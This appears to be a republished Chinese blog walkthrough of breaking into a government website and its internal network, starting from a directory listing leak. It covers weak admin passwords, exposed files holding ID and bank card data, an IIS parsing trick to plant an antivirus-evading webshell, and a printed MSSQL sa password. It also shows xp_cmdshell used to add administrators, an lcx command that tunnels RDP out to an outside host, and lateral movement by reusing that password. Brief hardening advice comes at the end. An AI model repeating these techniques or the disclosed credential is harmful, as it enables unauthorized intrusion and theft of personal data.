天天看點
傳回

從目錄資訊洩露到滲透内網

simeon

1.目錄資訊洩露

目錄資訊洩露是指當目前目錄無index.html/index.asp/index.php/index.asp.net等指定首頁的情況下,直接顯示目錄下所有的檔案及其目錄。測試方法和簡單,在網站路徑後輸入目錄名稱即可,一般的掃描軟體會自動識别該漏洞,如圖1所示,顯示該網站存在目錄漏洞。

圖1存在目錄洩露漏洞

2.發現背景弱密碼

   在目錄洩露的基礎上,發現網站存在背景管理位址,使用弱密碼admin/admin順利登陸該投票管理系統,如圖2所示。出現目錄洩露漏洞的網站背景密碼一般都比較簡單,比如admin/123456、admin/admin、admin/admin888等。

<a href="https://s4.51cto.com/wyfs02/M02/96/87/wKiom1kiuKXiMVRFAABv1bU_uj8430.jpg-wh_500x0-wm_3-wmp_4-s_2549836224.jpg" target="_blank"></a>

圖2擷取背景弱密碼

3.洩露檔案資訊

  如圖3所示,通過分析網站的源代碼,從源代碼中去尋找檔案夾,發現存在UpLoadFolder 檔案夾,通過位址http://**.*******.gov.cn/UpLoadFolder/進行通路,在該檔案夾下有大量的上傳檔案,單擊這些檔案連結,可以直接下載下傳檔案到本地。

<a href="https://s1.51cto.com/wyfs02/M02/96/87/wKioL1kiuKbzztAvAAHAkZyV2og874.jpg-wh_500x0-wm_3-wmp_4-s_3914276437.jpg" target="_blank"></a>

圖3上傳的所有檔案

4.發現資料庫檔案

   在該網站hzh目錄發現存在db目錄,繼續通路,如圖4所示,可以看到存在db.mdb,如果網站未做安全設定,該資料庫檔案可以直接下載下傳。

<a href="https://s1.51cto.com/wyfs02/M02/96/87/wKioL1kiuKfg6co0AABlaOJTVDc299.jpg-wh_500x0-wm_3-wmp_4-s_1619266235.jpg" target="_blank"></a>

圖4發現資料庫檔案

5.發現涉及個人隐私的檔案

   如圖5所示,在網站myupload檔案夾下,發現大量的txt檔案,打開後,在該檔案中包含大量的個人基本資訊,身份證賬号以及銀行卡資訊等。

<a href="https://s1.51cto.com/wyfs02/M00/96/87/wKiom1kiuKiBWmWnAAJunFkh1pA209.jpg-wh_500x0-wm_3-wmp_4-s_2292487624.jpg" target="_blank"></a>

圖5洩露個人銀行卡資訊

6.發現上傳檔案子產品

   在網站繼續檢視洩露目錄,如圖6所示,擷取了memberdl目錄,逐個通路檔案,其中aa.aspx為檔案上傳子產品。在一些檔案上傳頁面中可以直接上傳webshell。

<a href="https://s2.51cto.com/wyfs02/M00/96/87/wKiom1kiuKiQpK_2AACExEG5gEU535.jpg-wh_500x0-wm_3-wmp_4-s_3806013626.jpg" target="_blank"></a>

圖6擷取上傳頁面

7.構造檔案解析漏洞

在檔案上傳頁面,通過檢視,發現可以直接建立自定義檔案,在該目錄中建立1.asp檔案夾,如圖7所示,可以直接船艦1.asp檔案夾;然後選擇檔案上傳,如圖8所示,構造一個webshell的avi檔案,檔案名稱為1.avi。

<a href="https://s3.51cto.com/wyfs02/M00/96/87/wKioL1kiuKng880qAACJBD48b60034.jpg-wh_500x0-wm_3-wmp_4-s_1636300270.jpg" target="_blank"></a>

圖7建立1.asp檔案夾

<a href="https://s3.51cto.com/wyfs02/M01/96/87/wKiom1kiuKni8sNNAACq2Aiir3Y737.jpg-wh_500x0-wm_3-wmp_4-s_3996839247.jpg" target="_blank"></a>

圖8上傳1.avi檔案

通過浏覽1.avi擷取檔案的url位址,如圖9所示,将多數體連結位址複制下來,直接擷取webshell,使用中國菜刀管理工具,順利擷取webshell,如圖10所示。

<a href="https://s3.51cto.com/wyfs02/M00/96/87/wKioL1kiuKmQFTg7AADFf2VBbdQ371.jpg-wh_500x0-wm_3-wmp_4-s_3488341491.jpg" target="_blank"></a>

圖9擷取webshell位址

<a href="https://s2.51cto.com/wyfs02/M01/96/87/wKiom1kiuKqwEJDNAACmm20xw-M862.jpg-wh_500x0-wm_3-wmp_4-s_3857650318.jpg" target="_blank"></a>

圖10擷取webshell

8.擷取資料庫密碼

   通過中國菜刀後門管理工具,上傳一個asp的大馬,有時候webshell會被清除或者防火牆攔截,如圖11所示上傳一個免殺的webshell大馬,通過大馬對網站檔案進行檢視,在web.config檔案中擷取了mssql資料庫sa賬号和密碼“fds%$fDF”。

<a href="https://s2.51cto.com/wyfs02/M02/96/87/wKioL1kiuKvgHJAVAAKSuUvzQf0657.jpg-wh_500x0-wm_3-wmp_4-s_1492467317.jpg" target="_blank"></a>

圖11擷取資料庫密碼

9.MSSQL資料庫直接提權

    在webshell中,選擇提權工具-資料庫操作,如圖12所示,選擇元件檢測,擷取該作業系統為windows2003,資料庫為最高權限。

<a href="https://s1.51cto.com/wyfs02/M01/96/87/wKioL1kiuKvjWVZWAAE4PIlRYbM096.jpg-wh_500x0-wm_3-wmp_4-s_2078012227.jpg" target="_blank"></a>

圖12檢測元件

在系統指令中執行添加使用者和添加使用者到管理者操作,如圖13,圖14所示,選擇cmd_xpshell執行即可添加使用者和到管理者組。

<a href="https://s1.51cto.com/wyfs02/M02/96/87/wKiom1kiuKyDOfs1AAFieJQwpK8611.jpg-wh_500x0-wm_3-wmp_4-s_3760915421.jpg" target="_blank"></a>

圖13添加使用者群組

<a href="https://s1.51cto.com/wyfs02/M00/96/87/wKiom1kiuKyzDskCAAFmCBmIWPs764.jpg-wh_500x0-wm_3-wmp_4-s_3930623944.jpg" target="_blank"></a>

圖14檢視管理者組

10.使用lcx穿透進入内網

(1)上傳lcx檔案到C:\ydcz\cl目錄

(2)執行指令C:\ydcz\cl\lcx.exe -slave 122.115.**. ** 4433 10.0.11.129 3389

如圖15所示,該指令表示将10.0.11.129的3389端口連接配接到122.115. **.**的4433端口。

(3)在122.115. **. **伺服器上執行lcx –slave 4433 3389,如圖16所示。

<a href="https://s1.51cto.com/wyfs02/M02/96/87/wKioL1kiuTDDHKb9AADdx61Kt7U367.jpg-wh_500x0-wm_3-wmp_4-s_4120783944.jpg" target="_blank"></a>

圖15執行端口轉發

<a href="https://s4.51cto.com/wyfs02/M00/96/87/wKiom1kiuTDSLUu1AABtOO4LISg776.jpg-wh_500x0-wm_3-wmp_4-s_3328343598.jpg" target="_blank"></a>

圖16執行監聽

(4)在122.115.**.**伺服器使用mstsc登入位址127.0.0.1:4433,如圖17所示,輸入使用者名和密碼後,成功進入伺服器。

<a href="https://s1.51cto.com/wyfs02/M00/96/87/wKioL1kiuTCjkRaLAADUO6PwXIM702.jpg-wh_500x0-wm_3-wmp_4-s_3836006992.jpg" target="_blank"></a>

圖17成功進入内網伺服器

11.檢視和掃描内網

   可以使用端口掃描工具對内網IP進行掃描,有可以通過檢視網絡鄰居-檢視工作組計算機來擷取内網是否存在多台個人計算機或者伺服器,如圖18所示,顯示該内網存在幾十台個人桌面及伺服器。

<a href="https://s4.51cto.com/wyfs02/M01/96/87/wKioL1kiuTKgtoFyAAKfCyckG4w515.jpg-wh_500x0-wm_3-wmp_4-s_579980408.jpg" target="_blank"></a>

圖18發現内網存在多台伺服器和個人主機

12.利用已有資訊進行滲透

   在本例中擷取的sa密碼是進行内網權限擴充的一個好思路,通過掃描擷取10.0.11.31伺服器的sa跟掌握的密碼一樣,通過SQL Tools進行連接配接,如圖19所示,成功擷取目前權限為system權限,直接可以添加使用者登入3389。

<a href="https://s2.51cto.com/wyfs02/M01/96/87/wKiom1kiuTKTcUZsAACH_CAp0HY513.jpg-wh_500x0-wm_3-wmp_4-s_2439631042.jpg" target="_blank"></a>

圖19擷取系統權限

   由于本案例的目地是介紹通過資訊洩露滲透進入内網,對内網的滲透僅僅是通過sa密碼進行擴充,在本案例中,通過掃描,發現存在5台計算機使用相同的sa密碼,這五台計算機都是系統權限。在這個基礎上繼續滲透基本可以擷取整個網絡的權限。

13.目錄資訊洩露防範

(1)禁止Apache顯示目錄索引,禁止Apache顯示目錄結構清單,禁止Apache浏覽目錄。

将httpd.conf中的Options Indexes FollowSymLinks # 修改為: Options  FollowSymLinks

修改Apache配置檔案httpd.conf

搜尋“Options Indexes FollowSymLinks”,修改為“Options-Indexes FollowSymLinks”即可。

在Options Indexes FollowSymLinks在Indexes前面加上“–”符号。“+”代表允許目錄浏覽;“–”代表禁止目錄浏覽,這樣的話就屬于整個Apache禁止目錄浏覽了。通過.htaccess檔案,可以在根目錄建立或修改 .htaccess 檔案中添加“Options –Indexes”就可以禁止Apache顯示目錄索引。

(2)在IIS中需要設定“網站屬性”-“主目錄”-“目錄浏覽”,即不選擇即可。選擇表示允許目錄浏覽。

歡迎加入群513833068進行技術讨論。

 本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/1928354

安全 apache 資料庫 資料安全/隐私保護 索引 大資料管理隐私保護 apache記憶體資料 apache大資料開源 目錄資訊 apache實時資料
上一篇: 攻防實戰-使用Quarks PwDump擷取域控密碼
下一篇: ​如何快速利用s02-45漏洞擷取伺服器權限

繼續閱讀